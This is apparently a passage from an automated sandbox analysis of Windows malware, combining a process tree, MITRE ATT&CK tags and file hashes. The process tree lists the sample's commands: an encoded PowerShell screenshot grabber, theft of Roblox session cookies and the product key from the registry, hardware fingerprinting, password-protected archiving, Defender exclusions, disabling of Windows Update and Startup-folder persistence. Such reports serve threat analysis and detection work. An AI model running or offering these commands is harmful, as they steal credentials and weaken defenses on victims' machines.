cgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:4276
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
PID:3176 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nal01lkz\nal01lkz.cmdline"6⤵PID:4408
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA83.tmp" "c:\Users\Admin\AppData\Local\Temp\nal01lkz\CSCA849774CEA1E43FCA5195CA782C5CE.TMP"7⤵PID:5336
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:2224
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2488 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2512
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5484
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:1812
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3580 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2100
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:2300
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:392
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1972
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:2388
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2364
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:6032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5312
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:5832
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:1376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:4032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5984
-
C:\Windows\system32\getmac.exegetmac5⤵PID:4752
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exe a -r -hp"sn" "C:\Users\Admin\AppData\Local\Temp\OdNSK.zip" *"4⤵PID:3296
-
C:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exe a -r -hp"sn" "C:\Users\Admin\AppData\Local\Temp\OdNSK.zip" *5⤵
- Executes dropped EXE
PID:5980 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:5072
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:6052
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:4220
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:2400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1436
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:3280
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:4436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:3864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:3104
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1116 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:4692
-
C:\ProgramData\Non-Delete-Critical-files\CoinService.exeC:\ProgramData\Non-Delete-Critical-files\CoinService.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5872 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:6072
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3704
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3224 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2936 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1144 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5008 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5404 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2384 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:5600 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:3272 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:5548 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4336
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5804
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5856
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3456
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2560
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5812
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ \" -ad -an -ai#7zMap26929:144:7zEvent210501⤵
- Suspicious use of FindShellTrayWindow
PID:4524
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S1⤵
- Executes dropped EXE
PID:2684 -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6060
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"1⤵
- Executes dropped EXE
PID:3396 -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5596
-
C:\Windows\system32\rundll32.exe"rundll32.exe" desk.cpl,InstallScreenSaver C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr1⤵
- Modifies Control Panel
PID:4472 -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /p 2631202⤵
- Executes dropped EXE
PID:2540 -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /p 2631203⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3292
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S1⤵
- Executes dropped EXE
PID:4744 -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S2⤵
- Executes dropped EXE
PID:4904
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .exe"1⤵
- Executes dropped EXE
PID:4012 -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .exe"2⤵
- Executes dropped EXE
PID:5928
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Power Settings
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5962b890f95429f93e9e56f35d3208e59
SHA1a98559becdf6981f7335666418d5f35eef3bae34
SHA2562a97972bc0c3af489e1b551b995c198444785d5007930b6d0de8e6d5d025e868
SHA512e5aff298bd48e1c686ec527d3bf40f0a85e584ab0807c749b862f133171ab38835bfe95ba1d64ec2ece019d7f1fe64dbe5c7fa4685ab614a180fd61070acc8af
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
1KB
MD58cb18aac8b238208fa7e199650aa6c35
SHA1cdea1e5c967f546e57ddb0bb6ff56f1147785aab
SHA2566ef924d0124079e26fc60c1009271f2cb049303855a9c8de4f0be01f3e8d5423
SHA512b332c69da74e2527b4b168197fc8bea4367f202a555c2f1fc6e7519e05280deab17fe807bd3da44a43b6fec44ca24cc0ffb6899609808130008c82062d8cf056
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
1KB
MD5fb2dfbe6f31d02754ae7fa31048f907a
SHA102c7dadb67b3628bfae44eb88d96871437d47ae0
SHA2561287fe5298197e0ff7f66f76e4626f73bd506675375de3f9d70c4f7e0204121a
SHA512393b28797ff05ac462c8a5a5c7f4ba2e756ad059e5e46a538a6fd5fb640f1438fae07cf5bacb855518f686a5977043a2c8d859273eecf23d01dd5649f14cf1ec
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD55729e3bb5b67c187c03271b3ebf5c8c7
SHA1116d41e3450de5905be4301bc0209a203b728f8b
SHA256baec3d509d8f5a00f93af533e0731b5210e11b15a4250307b285aba90eaac816
SHA512c9c51c20c55baf6efdf8ab60d42130228b201b2c824ed6e59c12d02d2910bb19d176bf73f5fd0880838fc1b881123e9ba6f466b06dd750ab11885ba2ed02ef0d
-
Filesize
1KB
MD51348e4e8fc451e8021f935f4b1376c95
SHA1c6fecb47e09a1a255cbe9a9f03d91d2100cd1737
SHA256cdf0440a375c4d4a180a358ea3c87448482622fbc71833bc797ec1410e54bb01
SHA512ef23469825048d1fdc7f693a9efce5a1bdb8472743917288fa06244c7172d933347d8403440598a9f4062b3514ee313462655e21bc1c1a8dde78cfb607796703
-
Filesize
1KB
MD59c32516132d3fb495845fc6d80d03be9
SHA1b0f9a7898309c2fbc5538bd10065cced3f6d7114
SHA256a0533c03fe02f9d7956c3b3f1e1a85fa9da7ac5004f881f15dc2a793abc52a22
SHA512e1a8488d25e72557007211b49c0606bded23b04e7d0844611cbe7e9b6cd090c35758fa56c08fe48f4f3b118fe939926a30db24b4cb513d14a8a64200a8caa051
-
Filesize
1KB
MD5b742e2b02e010e4507d59ab375513174
SHA105458811335e96fd069dd3d164927513041c7b4b
SHA256e8d103e92fbaf535f09c8328980ef1f9740a5eec44c1e5fddd8c8586a969c44b
SHA51238538de76e552f7ac059e3697ceaee9f64a55aca7d7ed667d584dc07b99d057f93dd91b768ed54c846eb884034da5e85f6497eb9876338586bcdf93ecf5b1536
-
Filesize
20KB
MD55d47f381b687a13d87edead82d0871e9
SHA15169bd0978640845cc40fafacc4a6801ab423400
SHA2562b49175b957a9b6a652327b160709f47a6b07d8ed2428776fcd0551a9daf5b60
SHA512c94af5d6c7c1bd06b2a9d974706d8a87b21c9bb8ad0badde738b585092f0f504dc6a0f54faa001d03ca77fcbec3f9ba43abe68303bf4661873e1ef874fb7a385
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
152KB
MD573bd1e15afb04648c24593e8ba13e983
SHA14dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91
SHA256aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b
SHA5126eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7
-
Filesize
100KB
MD545504a732c2261ea90b34d223cc73ea9
SHA14726c7f640a60a2d96cd7c2d7dc347bee38a38b4
SHA25619ca1fc27a0eaaeddb5cc49534603aaa35ea17199b002cfb7af33647b0ef0d6e
SHA51237a2c201ef424e1555bb097aa834e5a83b1c98d57fff71a94ab1bc88e6fd519e35e4a55bd694a914b1257379b9fa241f3d6e4f402dd0517ca565c9300c538711
-
Filesize
46KB
MD58f5942354d3809f865f9767eddf51314
SHA120be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
1KB
MD54e51d92acd9400212e074933bd0a72ab
SHA1e97344ff785cef9f2cd0087640e063b35a2c1b62
SHA2565b1fbf08e08b5186e20c632488756554b7e6ba224ff048ff11ea7758379871e8
SHA512138a3abcf9f32ebf9442d58863c5f94db3a0b518b14b378cb8945f4274504608333e34adaadeddead5250185eb2233775066b40ea94b6f39bd06a12a95ed8c7d
-
Filesize
75KB
MD500a38e6ffb45888d07b850e4ade3b732
SHA1fcd96b923078830e6b832cc7d8df8eb2b6377e18
SHA256740a9c81b5215889138dbc771af1761835847c51b1ac6c5f4161cdcc05c4a5b6
